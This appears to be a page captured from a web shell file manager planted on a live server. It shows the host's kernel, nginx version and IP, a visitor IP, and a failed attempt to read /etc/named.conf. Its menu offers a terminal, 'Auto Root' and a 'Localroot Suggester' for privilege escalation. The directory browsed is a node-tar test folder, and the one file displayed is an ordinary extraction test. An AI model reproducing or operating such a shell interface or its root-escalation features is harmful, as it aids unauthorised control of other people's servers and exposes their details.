Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.143.215.114
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
tar /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
00-setup-fixtures.js
1.49
KB
-rw-r--r--
2015-09-10 01:47
cb-never-called-1.0.1.tgz
4
KB
-rw-r--r--
2015-09-10 01:47
dir-normalization.js
3.69
KB
-rw-r--r--
2015-09-10 01:47
dir-normalization.tar
4.5
KB
-rw-r--r--
2015-09-10 01:47
error-on-broken.js
768
B
-rw-r--r--
2015-09-10 01:47
extract-move.js
3.06
KB
-rw-r--r--
2015-09-10 01:47
extract.js
9.83
KB
-rw-r--r--
2015-09-10 01:47
fixtures.tgz
18.9
KB
-rw-r--r--
2015-09-10 01:47
header.js
10.15
KB
-rw-r--r--
2015-09-10 01:47
pack-no-proprietary.js
19.25
KB
-rw-r--r--
2015-09-10 01:47
pack.js
21.09
KB
-rw-r--r--
2015-09-10 01:47
parse-discard.js
643
B
-rw-r--r--
2015-09-10 01:47
parse.js
10.23
KB
-rw-r--r--
2015-09-10 01:47
zz-cleanup.js
430
B
-rw-r--r--
2015-09-10 01:47
Save
Rename
var fs = require('fs') var path = require('path') var zlib = require('zlib') var tap = require('tap') var tar = require('../tar.js') var file = path.join(__dirname, 'cb-never-called-1.0.1.tgz') var target = path.join(__dirname, 'tmp/extract-test') tap.test('preclean', function (t) { require('rimraf').sync(__dirname + '/tmp/extract-test') t.pass('cleaned!') t.end() }) tap.test('extract test', function (t) { var extract = tar.Extract(target) var inp = fs.createReadStream(file) inp.pipe(zlib.createGunzip()).pipe(extract) extract.on('error', function (er) { t.equal(er.message, 'unexpected eof', 'error noticed') t.end() }) extract.on('end', function () { t.fail('shouldn\'t reach this point due to errors') t.end() }) })